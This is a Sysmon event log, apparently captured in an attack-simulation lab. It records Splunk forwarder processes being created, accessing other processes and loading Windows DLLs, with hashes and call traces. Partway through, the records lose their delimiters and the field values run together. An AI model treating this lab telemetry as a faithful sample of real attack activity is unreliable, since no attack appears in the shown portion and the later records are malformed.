EventID=10 ProcessAccess (Version=3) | RecordID=99396 | UtcTime=2022-05-30 13:04:49.537 | SourceProcessGUID={326FD73D-A254-6294-0C00-000000005502} | SourceProcessId=848 | SourceThreadId=2056 | SourceImage=C:\Windows\system32\svchost.exe | TargetProcessGUID={326FD73D-A262-6294-2700-000000005502} | TargetProcessId=2872 | TargetImage=C:\Windows\sysmon64.exe | GrantedAccess=0x1400 | CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID=10 ProcessAccess (Version=3) | RecordID=99395 | UtcTime=2022-05-30 13:04:49.537 | SourceProcessGUID={326FD73D-A254-6294-0C00-000000005502} | SourceProcessId=848 | SourceThreadId=2056 | SourceImage=C:\Windows\system32\svchost.exe | TargetProcessGUID={326FD73D-A262-6294-2700-000000005502} | TargetProcessId=2872 | TargetImage=C:\Windows\sysmon64.exe | GrantedAccess=0x1400 | CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID=10 ProcessAccess (Version=3) | RecordID=99394 | UtcTime=2022-05-30 13:04:49.537 | SourceProcessGUID={326FD73D-A252-6294-0500-000000005502} | SourceProcessId=416 | SourceThreadId=532 | SourceImage=C:\Windows\system32\csrss.exe | TargetProcessGUID={326FD73D-C0F1-6294-3C0B-000000005502} | TargetProcessId=1388 | TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | GrantedAccess=0x1fffff | CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f

EventID=10 ProcessAccess (Version=3) | RecordID=99393 | UtcTime=2022-05-30 13:04:49.537 | SourceProcessGUID={326FD73D-A44C-6294-0501-000000005502} | SourceProcessId=5164 | SourceThreadId=6008 | SourceImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe | TargetProcessGUID={326FD73D-C0F1-6294-3C0B-000000005502} | TargetProcessId=1388 | TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | GrantedAccess=0x1fffff | CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID=1 ProcessCreate (Version=5) | RecordID=99392 | UtcTime=2022-05-30 13:04:49.538 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | FileVersion=- | Description=- | Product=- | Company=- | OriginalFileName=- | CommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 | CurrentDirectory=C:\Windows\system32\ | User=NT AUTHORITY\SYSTEM | LogonGuid={326FD73D-A253-6294-E703-000000000000} | LogonId=0x3e7 | TerminalSessionId=0 | IntegrityLevel=System | Hashes=MD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9 | ParentProcessGuid={326FD73D-A44C-6294-0501-000000005502} | ParentProcessId=5164 | ParentImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe | ParentCommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service

EventID=7 ImageLoaded (Version=3) | RecordID=99391 | UtcTime=2022-05-30 13:04:49.287 | ProcessGuid={326FD73D-C0F1-6294-3B0B-000000005502} | ProcessId=4896 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\kernel.appcore.dll | FileVersion=10.0.14393.2312 (rs1_release.180607-1919) | Description=AppModel API Host | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=kernel.appcore.dll | Hashes=MD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667D | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=10 ProcessAccess (Version=3) | RecordID=99390 | UtcTime=2022-05-30 13:04:49.287 | SourceProcessGUID={326FD73D-C0F1-6294-3B0B-000000005502} | SourceProcessId=4896 | SourceThreadId=6252 | SourceImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | TargetProcessGUID={326FD73D-A44C-6294-0501-000000005502} | TargetProcessId=5164 | TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe | GrantedAccess=0x101400 | CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID=7 ImageLoaded (Version=3) | RecordID=99389 | UtcTime=2022-05-30 13:04:49.287 | ProcessGuid={326FD73D-C0F1-6294-3B0B-000000005502} | ProcessId=4896 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\dbgcore.dll | FileVersion=10.0.14321.1024 (debuggers(dbg).210127-1811) | Description=Windows Core Debugging Helpers | Product=Microsoft® Windows® Operating System | Company=Microsoft | OriginalFileName=DBGCORE.DLL | Hashes=MD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2E | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99388 | UtcTime=2022-05-30 13:04:49.287 | ProcessGuid={326FD73D-C0F1-6294-3B0B-000000005502} | ProcessId=4896 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\dbghelp.dll | FileVersion=10.0.14321.1024 (rs1_release.160715-1616) | Description=Windows Image Helper | Product=Microsoft® Windows® Operating System | Company=Microsoft | OriginalFileName=DBGHELP.DLL | Hashes=MD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBE | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99387 | UtcTime=2022-05-30 13:04:49.068 | ProcessGuid={326FD73D-C0F1-6294-3B0B-000000005502} | ProcessId=4896 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\cryptbase.dll | FileVersion=10.0.14393.0 (rs1_release.160715-1616) | Description=Base cryptographic API DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=cryptbase.dll | Hashes=MD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99386 | UtcTime=2022-05-30 13:04:49.068 | ProcessGuid={326FD73D-C0F1-6294-3B0B-000000005502} | ProcessId=4896 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\rsaenh.dll | FileVersion=10.0.14393.4467 (rs1_release.210604-1844) | Description=Microsoft Enhanced Cryptographic Provider | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=rsaenh.dll | Hashes=MD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99385 | UtcTime=2022-05-30 13:04:49.068 | ProcessGuid={326FD73D-C0F1-6294-3B0B-000000005502} | ProcessId=4896 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\cryptsp.dll | FileVersion=10.0.14393.2969 (rs1_release.190503-1820) | Description=Cryptographic Service Provider API | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=cryptsp.dll | Hashes=MD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99384 | UtcTime=2022-05-30 13:04:49.068 | ProcessGuid={326FD73D-C0F1-6294-3B0B-000000005502} | ProcessId=4896 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\srvcli.dll | FileVersion=10.0.14393.5066 (rs1_release.220401-1841) | Description=Server Service Client DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=SRVCLI.DLL | Hashes=MD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1F | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99383 | UtcTime=2022-05-30 13:04:49.068 | ProcessGuid={326FD73D-C0F1-6294-3B0B-000000005502} | ProcessId=4896 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\bcrypt.dll | FileVersion=10.0.14393.4583 (rs1_release.210730-1850) | Description=Windows Cryptographic Primitives Library | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=bcrypt.dll | Hashes=MD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238D | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99382 | UtcTime=2022-05-30 13:04:49.068 | ProcessGuid={326FD73D-C0F1-6294-3B0B-000000005502} | ProcessId=4896 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\wkscli.dll | FileVersion=10.0.14393.5066 (rs1_release.220401-1841) | Description=Workstation Service Client DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=WKSCLI.DLL | Hashes=MD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99381 | UtcTime=2022-05-30 13:04:49.068 | ProcessGuid={326FD73D-C0F1-6294-3B0B-000000005502} | ProcessId=4896 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\netutils.dll | FileVersion=10.0.14393.0 (rs1_release.160715-1616) | Description=Net Win32 API Helpers DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=NETUTILS.DLL | Hashes=MD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99380 | UtcTime=2022-05-30 13:04:49.068 | ProcessGuid={326FD73D-C0F1-6294-3B0B-000000005502} | ProcessId=4896 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\netapi32.dll | FileVersion=10.0.14393.5125 (rs1_release.220429-1732) | Description=Net Win32 API DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=NetApi32.DLL | Hashes=MD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99379 | UtcTime=2022-05-30 13:04:49.053 | ProcessGuid={326FD73D-C0F1-6294-3B0B-000000005502} | ProcessId=4896 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll | FileVersion=14.16.27012.6 built by: vcwrkspc | Description=Microsoft® C Runtime Library | Product=Microsoft® Visual Studio® 2017 | Company=Microsoft Corporation | OriginalFileName=msvcp140.dll | Hashes=MD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DD | Signed=true | Signature=Microsoft Corporation | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99378 | UtcTime=2022-05-30 13:04:49.053 | ProcessGuid={326FD73D-C0F1-6294-3B0B-000000005502} | ProcessId=4896 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\msvcp_win.dll | FileVersion=10.0.14393.2999 (rs1_release_inmarket.190520-1518) | Description=Microsoft® C Runtime Library | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=msvcp_win.dll | Hashes=MD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59A | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99377 | UtcTime=2022-05-30 13:04:49.053 | ProcessGuid={326FD73D-C0F1-6294-3B0B-000000005502} | ProcessId=4896 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\oleaut32.dll | FileVersion=10.0.14393.4402 (rs1_release.210426-1725) | Description=OLEAUT32.DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=OLEAUT32.DLL | Hashes=MD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962F | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99376 | UtcTime=2022-05-30 13:04:49.053 | ProcessGuid={326FD73D-C0F1-6294-3B0B-000000005502} | ProcessId=4896 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\bcryptprimitives.dll | FileVersion=10.0.14393.4770 (rs1_release.211101-1440) | Description=Windows Cryptographic Primitives Library | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=bcryptprimitives.dll | Hashes=MD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99375 | UtcTime=2022-05-30 13:04:49.053 | ProcessGuid={326FD73D-C0F1-6294-3B0B-000000005502} | ProcessId=4896 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\combase.dll | FileVersion=10.0.14393.5125 (rs1_release.220429-1732) | Description=Microsoft COM for Windows | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=COMBASE.DLL | Hashes=MD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99374 | UtcTime=2022-05-30 13:04:49.053 | ProcessGuid={326FD73D-C0F1-6294-3B0B-000000005502} | ProcessId=4896 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\ole32.dll | FileVersion=10.0.14393.4651 (rs1_release.210911-1554) | Description=Microsoft OLE for Windows | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=OLE32.DLL | Hashes=MD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99373 | UtcTime=2022-05-30 13:04:49.053 | ProcessGuid={326FD73D-C0F1-6294-3B0B-000000005502} | ProcessId=4896 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\gdi32full.dll | FileVersion=10.0.14393.5125 (rs1_release.220429-1732) | Description=GDI Client DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=gdi32 | Hashes=MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EE | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99372 | UtcTime=2022-05-30 13:04:49.053 | ProcessGuid={326FD73D-C0F1-6294-3B0B-000000005502} | ProcessId=4896 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\Wldap32.dll | FileVersion=10.0.14393.5125 (rs1_release.220429-1732) | Description=Win32 LDAP API DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=WLDAP32.DLL | Hashes=MD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99371 | UtcTime=2022-05-30 13:04:49.053 | ProcessGuid={326FD73D-C0F1-6294-3B0B-000000005502} | ProcessId=4896 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\win32u.dll | FileVersion=10.0.14393.0 (rs1_release.160715-1616) | Description=Win32u | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=Win32u.DLL | Hashes=MD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99370 | UtcTime=2022-05-30 13:04:49.053 | ProcessGuid={326FD73D-C0F1-6294-3B0B-000000005502} | ProcessId=4896 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\adsldpc.dll | FileVersion=10.0.14393.0 (rs1_release.160715-1616) | Description=ADs LDAP Provider C DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=adsldpc | Hashes=MD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99369 | UtcTime=2022-05-30 13:04:49.053 | ProcessGuid={326FD73D-C0F1-6294-3B0B-000000005502} | ProcessId=4896 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\gdi32.dll | FileVersion=10.0.14393.4169
(rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000099368Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000099367Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000099366Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft 
Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000099365Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000099364Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000099363Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000099362Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000099361Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000099360Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program 